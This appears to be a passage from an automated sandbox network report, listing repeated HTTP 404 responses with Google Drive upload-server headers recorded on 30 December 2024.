                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC78Eg_lebVJmNqTSN2Hp2f97VQwEnQ1yWLx4yIIwGUyZJ90ztF7DZO_R1P-Eo6hh2G6Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:13 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-3PNiUUe4QZEUG1OWAadauQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5O3u_8ZOdKp7x1nJXtdfMiplaXFWiJxdpvSzn4neZy0S7znnRZctRxIrlsJE0sTf8KContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:14 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-QEzb38PhDBxuJuVM6hSlbA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4GpLwAMwHZLPgIdypb8KqqYpT2OACRHVqncowk_N-eAbtfZVBV_e5Eajxg4LzhRDgfq6NZXXUContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:14 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-HxC65DDnAqJQI2FntX3LfQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5rXXAg7yDs8NW4hhktZewdDwVO9HRhje8QvGtzHexT3U6psImp7I9j7CN5nDgklML883G8XOgContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:17 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-v7exrKLDwVoRyYNRKvCwqg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5PwjC9rZAEX_5pwAQXWx1y9KaHaZJI8ezMRpcBVuY0G2mmmKplU5oD-FIs-5kX-JL9Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:17 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-nLydl7xOb_8PlnBrkoyFKA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5vsTAmjyTuMs8-w1FGlLVYomydUx7LZG2uCRMTtX4YI_yJJ715fkPqV72CMJwVLNJUmSjzSqcContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:18 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-ewGTSbb5OHp6_cpMTNCVvg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7ju2qZ91y_vsQMq7rYjIkYp-U3Pz90BY8UMxZqIieOnq1LpH1epMqvhbjjm2qx5w2hContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:18 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-biEwedeytnvkzTr3VSxELw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7-f8mbrvkx35DRwltJ1vvArxwl05VqKond6OU1t0FsWjxyGH-m-CMJ3JHSi6EUlhFmContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:21 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-WE-vKCV-0CwNkNIUNGQUOg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6U7SkHgCFWVNvBsx6MKknBv0tX1mdUoYTO5gScq2t53SZTMnanqIWtn2mnZxJJvO8fContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:21 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-6YKQDDoArSa8Zn2XpjZOKw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6CwQR9sf0jLn3NHLLeoej-k-1l5drsjFsd1j0mvqlTcqy-sKaut4w6i4HtnxmYyIlJContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:22 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-KBQTsE4DM7dwDaqWe2ccSw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7ek4DTrJSkrOsL8HTQTi1aZNmyKRVi_VaihsDDPATtqvgqgtmGN1eSe6FluNvz9A9WContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:22 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-PVUMq_3d8Y9_mGPpznF8wQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7bwD9x-CW-GHrNkobMB7KQZ3cjIQJmiTR-CR0t6BnbdZcroDavlTrkBjCSIEyFMnZMRGsOu4sContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:24 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-3Wpzt7f35glZhQws6jFJIA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC43StYh49ff4b_3EvbR9uWH3FwqxE1vlNzd-1fj6bPklsmRTD_2xVzDUsDIEyPIMELBxz8G40EContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:24 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-y20FqzOOEE1FCtyV9Bw9_Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4uzHCCA7UoSH1C6V6vMQiLe-SMCS2KA5QtyymzHvcbkjw9Xz9iYLsDst2QGMoNJolYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:25 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-R__6xnqNscxuFlo-Jmhj-A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6csT7DbYDuOMUGduv6Nu6YyOM-q4kN3nuPOXouqhgBwc6PHNu1XmdQyi7-gKuWQVOvOYUKMngContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:25 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-T2mg1Hu8MPenIb7avuC6jA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7L3oSXdigHD8jgqE7gtFTP8l5lVHrovFtl15-7Kvhy8SAD9G9Qgp_i3AO8jEt7lnjnContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:26 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-IbdCGZhoIMLFwGZj9klqGA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4i5sEiNyuhF5BrVHo4KtU8SlgbZzzaJs43IqELHSfB4op5cFF3wffMqcnQ_poQGVmYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:26 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-RX7IWEMyYSlVbnXqrT9arg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5AqBy9tun8ULPigPs6eP5Rw7X9xxS8xTEBRJdmvV9LFu4mw9jyVnciP1I90ieAzGhuContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:27 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Zq4UQXsE6qTX5MUard894g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7OdJCWS8GWAEHBcwq9-Px8Yju_OnCITaRhviMQbE3wSvaOxGaTnhi9cgRPSTnDoLf6kj_QWqcContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:29 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-f_QRoN-R3_X3EOI7Zi64Pw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6xaSrhQGJ7C45JGhr4iSRwnGFFyeotzcyAm2_ZFNOGcUZasMQ1ePeTyeS8GUt0BlQqContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:29 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-GsATE1Ush8VDnI0-lNqljg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
